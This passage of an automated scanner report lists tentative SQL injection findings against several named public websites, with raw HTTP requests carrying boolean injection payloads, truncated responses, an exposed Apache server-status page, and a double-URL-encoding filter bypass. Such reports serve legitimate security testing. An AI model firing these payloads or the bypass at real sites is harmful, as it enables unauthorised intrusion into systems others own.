You don't even get a site specific 404: HTTP 500: Internal Server Error ({
"GrammarParsingError": "Invalid CQL : '"
})

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: TornadoServer/0.1
Date: Sat, 02 Apr 2011 03:00:05 GMT
Content-Length: 14756
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

1.8. http://www.excite.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.excite.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 86407274'%20or%201%3d1--%20 and 86407274'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, which may indicate that the input is being incorporated into a SQL query in an unsafe way. Note that both responses are the redirected front page (200 OK), which embeds live market quotes and score feeds that change between requests, so a size difference is expected without any database involvement.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status86407274'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.excite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:35:30 GMT
Server: Apache/1.3.20 (Unix) Resin/2.0.5
Pragma: no-cache
Cache-control: private
Expires: Sat 02 Apr 1977 17:15:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 89486


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   
    <script>
   pageId=Math.round(Math.random() * 10000000000);
   randomNum = Math.round(Math.random() * 100
...[SNIP]...
<script type="text/javascript">
var moPstat=0 ;
var SP500_LAST = '1,252.31';
var SP500_NET_CHANGE = '<font color=black>0.00</font>';

var MKT_TIME = '12:30 pm ET, Real-Time';

</script>

<font class=modspace><br></font>
<!-- EDHEDH END INCLUDE COMPONENT: MO -->
<!-- EDHEDH START INCLUDE COMPONENT: SP -->

<script type="text/javascript">
var SPstatus = 1 ;
</script>
<script type="text/javascript">
var spPstat=0 ;
nfl_scores = new Array();
nfl_scores[0] = "10-SEP-09|1|Thursday|Sep. 10, 2009|Pittsburgh|Tennessee|20090910023|Pit|Ten|Pre-game|20|30||||||||20090910|12";
nfl_scores[1] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Atlanta|Miami|20090913001|Atl|Mia|Pre-game|13|0||||||||20090913|15";
nfl_scores[2] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Baltimore|Kansas City|20090913033|Bal|KC|Pre-game|13|0||||||||20090913|15";
nfl_scores[3] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Carolina|Philadelphia|20090913029|Car|Phi|Pre-game|13|0||||||||20090913|15";
nfl_scores[4] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cincinnati|Denver|20090913004|Cin|Den|Pre-game|13|0||||||||20090913|15";
nfl_scores[5] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cleveland|Minnesota|20090913005|Cle|Min|Pre-game|13|0||||||||20090913|15";
nfl_scores[6] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Houston|New York|20090913034|Hou|NYJ|Pre-game|13|0||||||||20090913|15";
nfl_scores[7] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Indianapolis|Jacksonville|20090913011|Ind|Jac|Pre-game|13|0||||||||20090913|15";
nfl_scores[8] = "13-SEP-09|1|Sunday|Sep. 13, 2009|New Orleans|Detroit|20090913018|NO|Det|Pre-game|13|0||||||||20090913|15";
nfl_scores[9] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Tampa Bay|Dallas|20090913027|TB|Dal|Pre-game|13|0||||||||20090913|15";
nfl_scores[10] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Arizona|San Francisco|20090913022|Ari|SF|Pre-game|16|15||||||||20090913|15";
nfl_scores[11] = "13-SEP-09|1|Sunday|Sep. 13, 2009|New York|Washington|20090913019|NYG|Was|Pre-game|16|15||||||||20090913|15";
nfl_scores[12] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Seattle|St. Louis|20090913026|Sea|
...[SNIP]...

Request 2

GET /server-status86407274'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.excite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:35:31 GMT
Server: Apache/1.3.20 (Unix) Resin/2.0.5
Pragma: no-cache
Cache-control: private
Expires: Sat 02 Apr 1977 17:15:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 90131


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   
    <script>
   pageId=Math.round(Math.random() * 10000000000);
   randomNum = Math.round(Math.random() * 100
...[SNIP]...
<script type="text/javascript">
var moPstat=0 ;
var DOW_SYMBOL = '<a href="http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=^INDU&alias=/alias/money/cm/qt"><font color=#0033cc>DOW</font></a>';
var DOW_LAST = '11,231.96';
var DOW_NET_CHANGE = '<font color=black>0.00</font>';
var NASDAQ_SYMBOL ='<a href="http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=^COMPX&alias=/alias/money/cm/qt"><font color=#0033cc>NASDAQ</font></a>';
var NASDAQ_LAST = '2,243.32';
var NASDAQ_NET_CHANGE = '<font color=black>0.00</font>';
var SP500_SYMBOL = '<a href="http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=^INX&alias=/alias/money/cm/qt"><font color=#0033cc>S&P 500</font></a>';
var SP500_LAST = '1,252.31';
var SP500_NET_CHANGE = '<font color=black>0.00</font>';

var MKT_TIME = '12:30 pm ET, Real-Time';

</script>

<font class=modspace><br></font>
<!-- EDHEDH END INCLUDE COMPONENT: MO -->
<!-- EDHEDH START INCLUDE COMPONENT: SP -->

<script type="text/javascript">
var SPstatus = 1 ;
</script>
<script type="text/javascript">
var spPstat=0 ;
nfl_scores = new Array();
nfl_scores[0] = "10-SEP-09|1|Thursday|Sep. 10, 2009|Pittsburgh|Tennessee|20090910023|Pit|Ten|Pre-game|20|30||||||||20090910|12";
nfl_scores[1] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Atlanta|Miami|20090913001|Atl|Mia|Pre-game|13|0||||||||20090913|15";
nfl_scores[2] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Baltimore|Kansas City|20090913033|Bal|KC|Pre-game|13|0||||||||20090913|15";
nfl_scores[3] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Carolina|Philadelphia|20090913029|Car|Phi|Pre-game|13|0||||||||20090913|15";
nfl_scores[4] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cincinnati|Denver|20090913004|Cin|Den|Pre-game|13|0||||||||20090913|15";
nfl_scores[5] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cleveland|Minnesota|20090913005|Cle|Min|Pre-game|13|0||||||||20090913|15";
nfl_scores[6] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Houston|New York|20090913034|Hou|NYJ|Pre-game|13|0||||||||20090913|15";
nfl_scores[7] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Indianapolis|Jacksonvi
...[SNIP]...

1.9. http://www.helium.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.helium.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19769932'%20or%201%3d1--%20 and 19769932'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status?119769932'%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.helium.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:56:07 GMT
Server: Mongrel 1.1.3
Status: 404
Cache-Control: no-cache, max-age=3600
Content-Type: text/html; charset=utf-8
Content-Length: 14619
Set-Cookie: _helium_session=5edca78971d521c418cef18701baf2ba; path=/
Expires: Sat, 02 Apr 2011 03:56:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.helium.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Page Built: Sat Apr 02 02:56:07 +0000 2011 -->
<html xmlns="http:
...[SNIP]...
<script>var tagOptions415 = new Object();
tagOptions415.rel = 'Stylesheet';
tagOptions415.type = 'text/css';
tagOptions415.media = 'screen, projection';
heWriteAbsoluteBrowserAwareStyleSheetLink('main_knowledge','http://assets%d.helium.com',tagOptions415) </script>
<script>var tagOptions656 = new Object();
tagOptions656.rel = 'Stylesheet';
tagOptions656.type = 'text/css';
tagOptions656.media = 'print';
heWriteAbsoluteBrowserAwareStyleSheetLink('print_knowledge','http://assets%d.helium.com',tagOptions656) </script>
<script>var tagOptions381 = new Object();
heWriteAbsoluteJavaScriptTag('adcode.js','http://assets%d.helium.com',tagOptions381) </script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-8925353227623969");
GS_googleEnableAllServices();
</script>
<script type="text/javascript">
GA_googleUseIframeRendering();
</script>

<script type="text/javascript">
var HELAD_url_part_1 = "server-status?119769932'%20or%201%3d1--%20=1";
var HELAD_url_part_2 = "";
var adparams = new AdSales_pagesetup();
adparams.setPageName("cms_index");
</script>

</head>
<body>


<div id="bigWrapper">


<!-- google_ad_section_start(name=nav, weight=0.0) -->

<div id="topNav" class="noRelated">


   <div id="utilityNav">
<ul class="none">
<li><a href="http://video.helium.com" target="_top">Videos</a> |</li>

<li><a href="http://howto.helium.com" target="_top">How To Guides</a> |</li>
<li><a href="http://www.helium.com/content/helium-community" target="_top">Community</a></li>
</ul>
   
    <span id="loginStatus">
       
   
<a href="http://www.helium.com/users/my_account">My Helium</a> | <a href="http://www.helium.com/registration/signup" target="_top">Join</a> | <a href="http://www.helium.com/login?after_login=my_helium" target="_top">Log in</a>


...[SNIP]...

Request 2

GET /server-status?119769932'%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.helium.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:56:07 GMT
Server: Mongrel 1.1.3
Status: 404
Cache-Control: no-cache, max-age=3600
Content-Type: text/html; charset=utf-8
Content-Length: 14609
Set-Cookie: _helium_session=5edca78971d521c418cef18701baf2ba; path=/
Expires: Sat, 02 Apr 2011 03:56:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.helium.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Page Built: Sat Apr 02 02:56:07 +0000 2011 -->
<html xmlns="http:
...[SNIP]...
<script>var tagOptions429 = new Object();
tagOptions429.rel = 'Stylesheet';
tagOptions429.type = 'text/css';
tagOptions429.media = 'screen, projection';
heWriteAbsoluteBrowserAwareStyleSheetLink('main_knowledge','http://assets%d.helium.com',tagOptions429) </script>
<script>var tagOptions0 = new Object();
tagOptions0.rel = 'Stylesheet';
tagOptions0.type = 'text/css';
tagOptions0.media = 'print';
heWriteAbsoluteBrowserAwareStyleSheetLink('print_knowledge','http://assets%d.helium.com',tagOptions0) </script>
<script>var tagOptions195 = new Object();
heWriteAbsoluteJavaScriptTag('adcode.js','http://assets%d.helium.com',tagOptions195) </script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-8925353227623969");
GS_googleEnableAllServices();
</script>
<script type="text/javascript">
GA_googleUseIframeRendering();
</script>

<script type="text/javascript">
var HELAD_url_part_1 = "server-status?119769932'%20or%201%3d2--%20=1";
var HELAD_url_part_2 = "";
var adparams = new AdSales_pagesetup();
adparams.setPageName("cms_index");
</script>

</head>
<body>


<div id="bigWrapper">


<!-- google_ad_section_start(name=nav, weight=0.0) -->

<div id="topNav" class="noRelated">


   <div id="utilityNav">
<ul class="none">
<li><a href="http://video.helium.com" target="_top">Videos</a> |</li>

<li><a href="http://howto.helium.com" target="_top">How To Guides</a> |</li>
<li><a href="http://www.helium.com/content/helium-community" target="_top">Community</a></li>
</ul>
   
    <span id="loginStatus">
       
   
<a href="http://www.helium.com/users/my_account">My Helium</a> | <a href="http://www.helium.com/registration/signup" target="_top">Join</a> | <a href="http://www.helium.com/login?after_login=my_helium" target="_top">Log in</a>

       
...[SNIP]...

1.10. http://www.lyricsdepot.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.lyricsdepot.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 53844502'%20or%201%3d1--%20 and 53844502'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status53844502'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lyricsdepot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:19:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 4212
Connection: close
Content-Type: text/html

<html>
<head>
<title>The Four Freshmen Lyrics</title>
<meta name=description content="The Four Freshmen Lyrics at the Lyrics Depot">
<meta name=keywords content="The Four Freshmen, lyrics, free, song lyrics">
<link rel="stylesheet" type="text/css" href="/site/inc/stylesheet.css">
<script language="javascript" src="/site/inc/scripts40.js"></script>
<script language="javascript"><!--
var artist = 'The Four Freshmen';
--></script>
</head>
<body bgcolor="#2060A0">

<center>
<table width="760" border="0" bgcolor="#004080" cellpadding="10" cellspacing="0">
<tr>
<td class="path">
Lyrics Depot
</td>
<td class="path" align="right">
<script language="javascript"><!--
middlead();
--></script>
</td>
</tr>
<tr>
<td colspan="2" width="760" bgcolor="#909090" align="center">
<script type="text/javascript"><!--
e9 = new Object();
e9.addBlockingCategories="Pop-under,Pop-up";
e9.size = "728x90,468x60";
//--></script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/LyricsDepot/ROS/tags.js"></script>
</td>
</tr>
</table>
<table width="760" border="0" bgcolor="#004080" cellpadding="4" cellspacing="0">
<tr>
<td width="410" class="path">
<a href="http://www.lyricsdepot.com">Lyrics</a> &raquo; <b>The Four Freshmen Lyrics</b>
</td>
<form id="searchbox_016291345183668028587:91lghttsabu" action="http://www.lyricsdepot.com/searchresults.php">
<td width="350" class="path">
<span class="nobr">Find Song Lyrics: <input type="hidden" name="cx" value="016291345183668028587:91lghttsabu" /><input name="q" type="text" size="25" /> <input type="submit" name="sa" value="Search" /><input type="hidden" name="cof" value="FORID:11" /></span>
</td>
</form>
<script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_016291345183668028587%3A91lghttsabu"></script>

...[SNIP]...

Request 2

GET /server-status53844502'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lyricsdepot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:19:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 5160
Connection: close
Content-Type: text/html

doh<html>
<head>
<title>Lyrics Depot - Lyrics Not Found</title>
<link rel="stylesheet" type="text/css" href="/site/inc/stylesheet.css">
<script language="javascript" src="/site/inc/scripts40.js"></script>
</head>
<body bgcolor="#2060A0">

<center>
<table width="760" border="0" bgcolor="#004080" cellpadding="10" cellspacing="0">
<tr>
<td class="path">
LyricsDepot.com - Music Song Lyrics Archive
</td>
</tr>
<tr>
<td width="760" bgcolor="#909090" align="center">
<script type="text/javascript"><!--
e9 = new Object();
e9.addBlockingCategories="Pop-under,Pop-up";
e9.size = "728x90,468x60";
//--></script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/LyricsDepot/ROS/tags.js"></script>
</td>
</tr>
</table>
<table width="760" border="0" bgcolor="#004080" cellpadding="4" cellspacing="0">
<tr>
<td width="410" class="path">
Your #1 source for song lyrics!
</td>
<form id="searchbox_016291345183668028587:91lghttsabu" action="http://www.lyricsdepot.com/searchresults.php">
<td width="350" class="path">
<span class="nobr">Find Song Lyrics: <input type="hidden" name="cx" value="016291345183668028587:91lghttsabu" /><input name="q" type="text" size="25" /> <input type="submit" name="sa" value="Search" /><input type="hidden" name="cof" value="FORID:11" /></span>
</td>
</form>
<script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_016291345183668028587%3A91lghttsabu"></script>
</tr>
</table>
<table width="760" border="0" bgcolor="#C0C0C0" cellpadding="10" cellspacing="0">
<tr>
<td valign="top" bgcolor="#909090" class="menu" width="140">
<p><b>Link to Us</b><br>
Webmasters! Like this song? <a href="javascript:addLink('Lyrics+Depot','http://www.lyricsdepot.com')">Add a link</a> to our site.
<p><b>Bookmark</b><br>
Like the sit
...[SNIP]...

1.11. http://www.newsweek.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.newsweek.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 55974988%20or%201%3d1--%20 and 55974988%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status?155974988%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newsweek.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Age: 0
Cache-Control: max-age=120
Content-Type: text/html; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 02:47:04 GMT
Expires: Sat, 02 Apr 2011 02:49:04 GMT
Server: Apache
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cacheable: YES
X-Varnish: 1753611622
Content-Length: 4028
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for www.newsweek.com</h1>

<dl><dt>Server Version: Apache/2.2.8
...[SNIP]...
<dt>Server Built: Jun 18 2010 11:00:02
</dt></dl><hr /><dl>
<dt>Current Time: Saturday, 02-Apr-2011 02:47:04 UTC</dt>
<dt>Restart Time: Friday, 18-Feb-2011 18:54:38 UTC</dt>
<dt>Parent Server Generation: 6</dt>
<dt>Server uptime: 42 days 7 hours 52 minutes 25 seconds</dt>
<dt>3 requests currently being processed, 72 idle workers</dt>
</dl><pre>______________W______K___.......................................
_________________________.......................................
____________________K____.......................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
</pre>
<p>Scoreboard Key:<br />
"<b><code>_</code></b>" Waiting for Connection,
"<b><code>S</code></b>" Starting up,
"<b><code>R</code></b>" Reading Request,<br />
"<b><code>W</code></b>" Sending Reply,
"<b><code>K</code></b>" Keepalive (read),
"<b><code>D</code></b>" DNS Lookup,<br />
"<b><code>C</code></b>" Closing connection,
"<b><code>L</code></b>" Logging,
"<b><code>G</code></b>" Gracefully finishing,<br />
"<b><code>I</code></b>" Idle cleanup of worker,
"<b><code>.</code></b>" Open slot with no current process</p>
<p />
PID Key: <br />
<pre>
9234 in state: _ , 9234 in state: _ , 9234 in state: _
923
...[SNIP]...

Request 2

GET /server-status?155974988%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newsweek.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Age: 0
Cache-Control: max-age=120
Content-Type: text/html; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 02:47:04 GMT
Expires: Sat, 02 Apr 2011 02:49:04 GMT
Server: Apache
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cacheable: YES
X-Varnish: 1753611626
Content-Length: 4078
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for www.newsweek.com</h1>

<dl><dt>Server Version: Apache/2.2.8
...[SNIP]...
<dt>Server Built: Mar 9 2010 20:42:14
</dt></dl><hr /><dl>
<dt>Current Time: Saturday, 02-Apr-2011 02:47:04 UTC</dt>
<dt>Restart Time: Friday, 18-Feb-2011 18:54:09 UTC</dt>
<dt>Parent Server Generation: 6</dt>
<dt>Server uptime: 42 days 7 hours 52 minutes 54 seconds</dt>
<dt>4 requests currently being processed, 71 idle workers</dt>
</dl><pre>_______KK__________K_____.......................................
_________________________.......................................
................................................................
___W_____________________.......................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
</pre>
<p>Scoreboard Key:<br />
"<b><code>_</code></b>" Waiting for Connection,
"<b><code>S</code></b>" Starting up,
"<b><code>R</code></b>" Reading Request,<br />
"<b><code>W</code></b>" Sending Reply,
"<b><code>K</code></b>" Keepalive (read),
"<b><code>D</code></b>" DNS Lookup,<br />
"<b><code>C</code></b>" Closing connection,
"<b><code>L</code></b>" Logging,
"<b><code>G</code></b>" Gracefully finishing,<br />
"<b><code>I</code></b>" Idle cleanup of worker,
"<b><code>.</code></b>" Open slot with no current process</p>
<p />
PID Key: <br />
<pre>
27905 in state: _ , 27905 in state: _ , 27905 in state: _

...[SNIP]...

1.12. http://www.qwickstep.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.qwickstep.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request

GET /server-status%2527 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qwickstep.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 00:14:56 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Cookie
Content-Length: 28254

<html>
<head>
   <title>QwickStep Answers Search Engine</title>
   <meta name="keywords" value="">
   <meta name="description" value="QwickStep Answers Search Engine">
   <meta name="cpalead-verification" con
...[SNIP]...
<a href="/search/view-answer/why-postgresql.html" class="top-weight-1">
...[SNIP]...

1.13. http://www.smartertravel.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.smartertravel.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 61858445'%20or%201%3d1--%20 and 61858445'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status61858445'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smartertravel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:21:54 GMT
Server: Apache
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STM=f82e9fa182547509f84a4f1f0c8a14823c1bbf7517bd0e0298a9baacf9d35cd769c0f74c8ddce822a9f3d235f76d2a8384ac7997b4dca7eecf7c290959a769f8; expires=Sun, 01-Apr-2012 02:21:54 GMT; path=/
Set-Cookie: vid=4d9688423d6c39.84045331; path=/; domain=.smartertravel.com
Set-Cookie: uu=7a21d162-badf-46e5-9505-dda26258daf7; path=/; domain=.smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Set-Cookie: entry_time=time; path=/; domain=smartertravel.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 23881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
<img src="http://stats.smartertravel.com/b/ss/sltravelcom/1/H.10--NS/1361859917?g=http%3A%2F%2Fwww.smartertravel.com%2Ferrordocs%2F404.php&amp;r=&amp;s.eVar37=1%7CI4&amp;s.channel=404+Error&amp;s.eVar24=404+Error&amp;s.pageType=errorPage&amp;s.server=app24&amp;s.eVar11=22&amp;s.events=event11%2Cevent12%2Cevent15" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.10. -->
</div>

<div id="outer_wrapper">

<div id="wrapper">
   <p class="hide"><a href="#top">Skip navigation</a></p>
<div id="masthead">
           <a href="http://www.smartertravel.com/">
           <img src="http://i.slimg.com/st/header/2.0/header-bg-left.gif" alt="Cheap Airfare, Vacation Deals, Car Rental, and Discount Travel - SmarterTravel.com" />
       </a>
       <div class='search_wrapper'><div class='search'>
       <form method="get" action="http://www.smartertravel.com/search/" target="_top">
           <input type="text" class="search_text" name="q" value=""/> <input type="image" class="search_submit" src="http://i.slimg.com/st/buttons/pluck/1.2/search.png" alt="Search Button"/>
       </form>
   </div></div>
   <div id="MySmarterTravel">
   <div class="st_profile_image">
       <div class="st_profile_shadow"><img src="http://i.slimg.com/st/avatar-shadow.png" alt="shadow" /></div>
       <div class="st_profile_actual_image"><a href="http://www.smartertravel.com/community/"><img src="http://sitelife.smartertravel.com/ver1.0/Content/images/no-user-image.gif" alt="User's Avatar" /></a></div>
   </div>
   <div class="st_header">My SmarterTravel</div>
   <div class="st_links">
       <a href="/community/login.php" id="login_layer">Log In</a> |
       <a href="/community/register.php" id="signup_layer">Join Now</a>    </div>
</div>
   <!-- <div class="survey_wrapper"><span class="obf href:$|d~$|i~0tvc0tvswfz/qiq@sfuvso>$|d~$|i~0tfswfs.tubuvt72969556(&31ps&312&4e2..&31@IUUQIPTU>$|i~" id="4d96884258ca3" >Join our survey panel</span></div> -->
</div>

<ul id="topnav_tabs">
<li id="st_home_page_tab" class="nav_tab"><a href="/" target="_top" rel="nofollow"><span>home</span></a><ul><li>&n
...[SNIP]...

Request 2

GET /server-status61858445'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
